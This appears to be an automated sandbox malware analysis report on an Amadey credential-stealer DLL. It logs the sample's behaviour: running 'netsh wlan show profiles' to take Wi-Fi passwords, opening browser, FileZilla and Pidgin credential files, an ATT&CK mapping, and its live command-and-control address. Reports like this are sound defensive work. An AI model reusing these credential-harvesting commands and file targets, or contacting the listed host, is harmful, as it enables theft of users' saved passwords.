    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    barindex
    Yara detected Amadeys stealer DLL
    Source: Yara matchFile source: cred64.dll.dll, type: SAMPLE
    Tries to harvest and steal WLAN passwords
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\logins.jsonJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
    Tries to steal Instant Messenger accounts or passwords
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\jAveQpPIqVgzrFhGHEkUaNfyPFRkLqNxLXqbGnErcoWnknvmXUONhjDsixnMGk\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\jAveQpPIqVgzrFhGHEkUaNfyPFRkLqNxLXqbGnErcoWnknvmXUONhjDsixnMGk\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\jAveQpPIqVgzrFhGHEkUaNfyPFRkLqNxLXqbGnErcoWnknvmXUONhjDsixnMGk\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\.purple\accounts.xmlJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		111
    Process Injection    		1
    Disable or Modify Tools    		2
    OS Credential Dumping    		1
    Security Software Discovery    		Remote Services2
    Data from Local System    		1
    Non-Application Layer Protocol    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		1
    Credentials in Registry    		1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media11
    Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
    Process Injection    		1
    Credentials In Files    		21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Rundll32    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1620559 Sample: cred64.dll.exe Startdate: 21/02/2025 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 8 other signatures 2->60 9 loaddll64.exe 1 2->9         started        process3 process4 11 rundll32.exe 29 9->11         started        14 rundll32.exe 27 9->14         started        17 cmd.exe 1 9->17         started        19 3 other processes 9->19 dnsIp5 70 System process connects to network (likely due to code injection or exploit) 11->70 72 Tries to steal Instant Messenger accounts or passwords 11->72 74 Tries to harvest and steal ftp login credentials 11->74 76 Tries to harvest and steal browser information (history, passwords, etc) 11->76 21 powershell.exe 11->21         started        24 netsh.exe 11->24         started        52 185.196.8.37, 49701, 49702, 49729 SIMPLECARRER2IT Switzerland 14->52 78 Uses netsh to modify the Windows network and firewall settings 14->78 80 Tries to harvest and steal WLAN passwords 14->80 26 powershell.exe 14->26         started        29 netsh.exe 2 14->29         started        31 rundll32.exe 27 17->31         started        signatures6 process7 file8 33 conhost.exe 21->33         started        35 conhost.exe 24->35         started        50 C:\Users\user\...\246122658369_Desktop.zip, Zip 26->50 dropped 62 Loading BitLocker PowerShell Module 26->62 37 conhost.exe 26->37         started        39 conhost.exe 29->39         started        64 Tries to steal Instant Messenger accounts or passwords 31->64 66 Tries to harvest and steal WLAN passwords 31->66 41 powershell.exe 25 31->41         started        44 netsh.exe 2 31->44         started        signatures9 process10 signatures11 68 Loading BitLocker PowerShell Module 41->68 46 conhost.exe 41->46         started        48 conhost.exe 44->48         started        process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    cred64.dll.dll68%ReversingLabsWin64.Infostealer.Tinba
    cred64.dll.dll78%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://185.196.8.37/ds0%Avira URL Cloudsafe
    http://185.196.8.37/50%Avira URL Cloudsafe
    http://185.196.8.37/lorer_RecentFilesl0%Avira URL Cloudsafe
    http://185.196.8.37/Gd85kkjf/index.php100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1es5100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1=100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1XyH100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php%0%Avira URL Cloudsafe
    http://185.196.8.37/Gd85kkjf/index.php#100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1s100%Avira URL Cloudmalware
    http://185.196.8.37/t%0%Avira URL Cloudsafe
    http://185.196.8.37/Gd85kkjf/index.php?wal=1b100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1rer100%Avira URL Cloudmalware
    http://185.196.8.37/Gd85kkjf/index.php?wal=1(100%Avira URL Cloudmalware
    http://185.196.8.37/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://185.196.8.37/Gd85kkjf/index.phptrue
    • Avira URL Cloud: malware
    		unknown
    http://185.196.8.37/Gd85kkjf/index.php?wal=1true
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.1356866325.000002C920496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1419781847.0000025AB8226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1355712953.0000025AA9A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1556863024.00000191C3645000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.1401642278.00000191B37F8000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
